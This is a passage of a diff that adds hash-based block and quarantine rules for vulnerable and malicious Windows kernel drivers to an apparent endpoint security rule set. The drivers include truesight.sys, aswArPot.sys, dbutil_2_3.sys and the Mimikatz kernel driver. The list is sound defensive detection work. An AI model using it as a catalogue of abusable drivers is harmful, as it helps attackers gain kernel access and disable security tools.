+ "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "43aa8ac6-2aed-5369-a9a7-ca12b9fc6d51",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818899Z",
+ "creation_date": "2026-03-23T11:45:31.818902Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818910Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bf82ad779c62df6d85fd97a21258543cf7f25947f67d9d5ce35d73a2cfef6f95",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "43b0ef74-1d6e-500b-942e-dde6933571d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968951Z",
+ "creation_date": "2026-03-23T11:45:29.968953Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968959Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6e0aa67cfdbe27a059cbd066443337f81c5b6d37444d14792d1c765d9d122dcf",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "43be0e44-e6ad-588c-9ae9-8c2cf439f831",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970623Z",
+ "creation_date": "2026-03-23T11:45:29.970626Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970634Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff3612ac3d95adc372cc9df3bdcaec657740d413d8d836bf367285acc5434085",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "43d6686c-09a3-5dc4-921e-14fa7e5b3f12",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488223Z",
+ "creation_date": "2026-03-23T11:45:31.488225Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488230Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3a7e1bdc61c90808173e4745808fec9c9d21d77111bae07ae387b12782344902",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "43dc0db8-d179-5b59-95d2-c308a08103d9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605891Z",
+ "creation_date": "2026-03-23T11:45:29.605893Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605899Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "accc8e337514f7a29c776518f83b925d3096d51e0aedd06ab75250c463f2a132",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "43e092c4-c9f3-59a3-8fde-808f9b9c3307",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826621Z",
+ "creation_date": "2026-03-23T11:45:30.826623Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826628Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4f981d1b09125f168c6868962dcd9e9991c494a8610874748250cfcc4af7797b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "43e96b9a-3413-5bc8-aa1a-30a5818810f2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607130Z",
+ "creation_date": "2026-03-23T11:45:29.607132Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607137Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "87e38e7aeaaaa96efe1a74f59fca8371de93544b7af22862eb0e574cec49c7c3",
+ "comment": "Dell vulnerable driver (aka dbutil_2_3.sys) [CVE-2021-21551] [https://github.com/SpikySabra/Kernel-Cactus] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "441530f7-6df6-5dfc-95a8-6016184450b2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156196Z",
+ "creation_date": "2026-03-23T11:45:31.156198Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156204Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fba0815c4be3fb2b11c066560c5d0265ff94d01795a88ca74e8c7f360bdbcf7f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4419950d-04ad-5ea6-8f4d-e2ddb8dc2d44",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475475Z",
+ "creation_date": "2026-03-23T11:45:30.475478Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475487Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4225bd4ba3f5d6d5cbd0606402aedca7342e2538abf85309ed3ccef0a738cbb8",
+ "comment": "Malicious Kernel Driver (aka a26363e7b02b13f2b8d697abb90cd5c3.sys) [https://www.loldrivers.io/drivers/ef6b5fe8-6c4b-4b32-8adc-c1d8a83e8558/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4423177c-9e0b-59c9-85fe-a7e374c50dfe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830150Z",
+ "creation_date": "2026-03-23T11:45:31.830152Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830158Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "85bdd4eb7868d84c15de202018937838f5c9b6b173c30cd6228cb9272b567182",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4423bf76-16fa-548e-85fd-a01e1b4beffb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811957Z",
+ "creation_date": "2026-03-23T11:45:31.811959Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811965Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ecad5289a6955e2dd72964beb6fe9d56ce961f00dad451e955af0ce399ae4c63",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "44366df7-cc5c-556a-8ebc-32014bce353b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490023Z",
+ "creation_date": "2026-03-23T11:45:31.490026Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490035Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a12502e4943714591eafa4a56da73d3df723ba2f873826d6b4bd48a1929a69ea",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "444857d4-8300-5edd-9957-19dcd39282de",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976446Z",
+ "creation_date": "2026-03-23T11:45:29.976448Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976453Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "444d6267-1103-5085-bbce-8c5c7ac39698",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832712Z",
+ "creation_date": "2026-03-23T11:45:30.832714Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832720Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6ebd3a622b92f28e6adb3570a0b9d11c166a3df492118aa7d27608735d304da7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4465a05b-a8e3-5236-b94b-d69ecf2393d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145585Z",
+ "creation_date": "2026-03-23T11:45:32.145587Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145593Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "56ece6b6b1d2da18458c9d8edc586bd2b9f7c4b092a9745fbed659238b2b3157",
+ "comment": "Vulnerable Kernel Driver (aka pxitrig64.sys) [https://www.loldrivers.io/drivers/c8619f49-8e23-489b-9878-53d27533da15/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4480634c-180c-5b8a-b90e-d002b4460409",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617448Z",
+ "creation_date": "2026-03-23T11:45:29.617451Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617456Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c825a47817399e988912bb75106befaefae0babc0743a7e32b46f17469c78cad",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4484d04f-e24e-5e1f-85e6-b60c2c1a3479",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619829Z",
+ "creation_date": "2026-03-23T11:45:29.619832Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619839Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "85c5e66f38152d17d5b580126b3348579263bbc8fd22e5417c0090fd75a330ac",
+ "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "44856600-f87f-5fb5-8dcb-4feaffb7a739",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494638Z",
+ "creation_date": "2026-03-23T11:45:31.494640Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494645Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "25c22c2f8a531085ec80c2da27bd1747ff7b7aad4918b59828607edfb9f44802",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4491e865-c96f-55b6-a95f-7c0dc7c11bb4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145930Z",
+ "creation_date": "2026-03-23T11:45:32.145932Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145937Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2559a34af1cc5cd65bfd4334d053294046e05d833937e3b6fbfe7ddd381d0963",
+ "comment": "Malicious Kernel Driver (aka driver_d9f15d91.sys) [https://www.loldrivers.io/drivers/576bb95a-f15e-4a0d-bcee-08791e1504e2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "44935acf-c6ff-55a8-9f5f-03d963e5c209",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495529Z",
+ "creation_date": "2026-03-23T11:45:31.495531Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495536Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee5d373e156cff39edeb97f3c5c18ff312d2157d856cd2f594af1d7cf4e61749",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "449fb1fe-4b65-5e77-b233-a152fad8466b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494222Z",
+ "creation_date": "2026-03-23T11:45:31.494225Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494232Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b2e17957495b1fd61690f4e580a3038c5dc773d86567034669d3fe0cdc35653a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "44a43175-f9c7-5fea-90dd-0ba302eb4b6a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829681Z",
+ "creation_date": "2026-03-23T11:45:31.829684Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829693Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9bbd93e1a032616ad55c4f8a92e78a849e424eb6d4cd945d794fbd39a234ce58",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
